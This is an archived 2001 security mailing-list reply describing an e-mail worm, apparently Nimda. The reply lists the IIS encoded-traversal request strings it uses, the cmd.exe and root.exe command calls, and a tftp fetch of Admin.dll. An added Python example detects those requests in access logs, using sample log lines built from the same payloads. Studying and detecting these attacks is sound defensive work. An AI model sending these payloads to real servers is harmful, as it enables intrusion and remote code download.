Security Incidents mailing list archives
Re: New worm ??
From: "Jay D. Dyson" <jdyson () treachery net>
Date: Tue, 18 Sep 2001 09:14:47 -0700 (PDT)
-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 18 Sep 2001, Cory McIntire wrote:

> I and a few others I know are getting bombarded on our machines with IIS requests.... Looks like another worm, and it's much smarter than before; it seems to stay within the same class A and sometimes the same class B as the attacking machine is in. Here is an excerpt of what I believe is the full scan....
Here's what I've been able to determine thus far:

There is an e-mail worm propagating right now that comes with the payload 'readme.exe'. I suspect this e-mail worm preys on Outlook MUAs, but I have no confirmation of this since the e-mails I've received have been bounces. (Whoever released one iteration of this worm has the "From" address as 'staff () attrition org'.)

This payload does a load of things to assure its propagation. However, it differs from other e-mail-based worms in that it also launches a number of web-based attacks. Namely:
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
As can be seen above, it also attempts to make a tftp retrieval for Admin.dll.

*sigh* Yet another worm made possible by the insecurity of Microsoft.
- -Jay
( ( _______
)) )) .--"There's always time for a good cup of coffee"--. >====<--.
C|~~|C|~~| (>------ Jay D. Dyson -- jdyson () treachery net ------<) | = |-'
`--' `--' `-- What doesn't kill us only makes us stronger. --' `------'
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.
iQCVAwUBO6dk6rlDRyqRQ2a9AQGaKwQAlDjzzfpgW0vqzLIjHj+z4rGJSYf4S8u6
adoqIruHbsmg+UpeeZsvSzmwnGzyKejmhPEo8QqTVtdh3aldssaDgoMLBAU+ryBE
2d38EPCG4Y/mGdd8mmCCYqtZu37oy4ZTmURiG9oOdERFFQ7y3W4IQUE8VifiAOCq
di6p4ruu1Ic=
=kS6c
-----END PGP SIGNATURE-----
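The request strings quoted in the message above all rely on the same two server-side decoding weaknesses: double percent-encoding (`%255c` decodes first to `%5c` and then to `\`) and lenient two-byte UTF-8 handling (`%c0%af` accepted as `/`, `%c1%9c` as `\`). A defender reviewing web logs wants to see the request the way a lenient server would, not the way it appears on the wire. The following is an added detection example, not code from the original post or from any of the participants: it canonicalises the path by decoding twice, applying a lenient UTF-8 decode that models the IIS behaviour described (an assumption about the exact server semantics), folding backslashes to slashes, and then flags directory traversal plus the tool names that appear in the list (`cmd.exe`, `root.exe`, `tftp`, `Admin.dll`). The log lines, IP addresses and timestamps are constructed for the example.

```python
"""Defensive detection example: flag access-log requests that use the
encoded traversal patterns quoted in the post (double URL-encoding and
overlong/lenient UTF-8 sequences) by canonicalising the path the way a
lenient server would and looking for the traversal that results."""
import re
from urllib.parse import unquote_to_bytes

# Constructed common-log-format sample (not taken from the post).
SAMPLE_LOG = """\
10.0.0.5 - - [18/Sep/2001:09:10:01 -0700] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
10.0.0.5 - - [18/Sep/2001:09:10:02 -0700] "GET /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 -
10.0.0.5 - - [18/Sep/2001:09:10:03 -0700] "GET /scripts/root.exe?/c+tftp%20-i%2010.0.0.5%20GET%20Admin.dll HTTP/1.0" 200 -
10.0.0.7 - - [18/Sep/2001:09:10:04 -0700] "GET /index.html HTTP/1.0" 200 1234
10.0.0.7 - - [18/Sep/2001:09:10:05 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
"""

# Only the client IP and the request path are needed from each line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<path>\S+)')

# Names of the binaries/tools that appear in the worm's request list.
TOOL_MARKERS = ("cmd.exe", "root.exe", "tftp", "admin.dll")


def lenient_utf8(data):
    """Decode bytes the way a lenient server would (assumption: this models
    the IIS decoding that turned %c0%af into '/' and %c1%9c into '\\').
    A two-byte lead (0xC0-0xDF) takes the low six bits of the following
    byte even when that byte is not a valid continuation byte.
    Returns (text, overlong_seen); a 0xC0/0xC1 lead always encodes a code
    point below 0x80 and is therefore never a legitimate encoding."""
    out = []
    overlong = False
    i = 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):
            cp = ((b & 0x1F) << 6) | (data[i + 1] & 0x3F)
            if b in (0xC0, 0xC1):
                overlong = True
            out.append(chr(cp))
            i += 2
        else:
            out.append(chr(b) if b < 0x80 else "\ufffd")
            i += 1
    return "".join(out), overlong


def canonicalise(path):
    """Percent-decode twice (so %255c -> %5c -> '\\' and %%35c -> %5c -> '\\'),
    apply the lenient UTF-8 decode, and fold backslashes to slashes.
    Returns (canonical_path, encoding_tricks_observed)."""
    reasons = []
    once = unquote_to_bytes(path)
    twice = unquote_to_bytes(once)
    if twice != once:
        reasons.append("double-encoding")
    text, overlong = lenient_utf8(twice)
    if overlong:
        reasons.append("overlong-utf8")
    return text.replace("\\", "/"), reasons


def classify_request(path):
    """Return the canonical form of one request path, the reasons it was
    flagged, and an overall suspicious flag."""
    canonical, reasons = canonicalise(path)
    # Traversal lives in the path part; the command lives in the query
    # (e.g. "?/c+dir"), so split them before the traversal check.
    url_path, _, _query = canonical.partition("?")
    if re.search(r"(^|/)\.\.(/|$)", url_path):
        reasons.append("traversal")
    low = canonical.lower()
    for marker in TOOL_MARKERS:
        if marker in low:
            reasons.append("tool:" + marker)
    return {"canonical": canonical, "reasons": reasons, "suspicious": bool(reasons)}


def scan_log(text):
    """Run the classifier over common-log-format lines and return one
    record per flagged request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_request(m.group("path"))
        if verdict["suspicious"]:
            hits.append({"ip": m.group("ip"), "path": m.group("path"), **verdict})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["canonical"], ",".join(hit["reasons"]))
```

Running the block prints four flagged requests from the five sample lines; the benign `/index.html` request produces no reasons and is skipped. Matching on the canonical form rather than the raw string is what makes the check cover every encoding variant in the post at once, including ones that mix double-encoding and overlong sequences in the same path.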
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
Current thread:
- New worm ?? Cory McIntire (Sep 18)
- Re: New worm ?? Jay D. Dyson (Sep 18)
- RE: New worm ?? Olivier DEMBOUR (Sep 18)
- Re: New worm ?? Pedro Miller Rabinovitch (Sep 18)
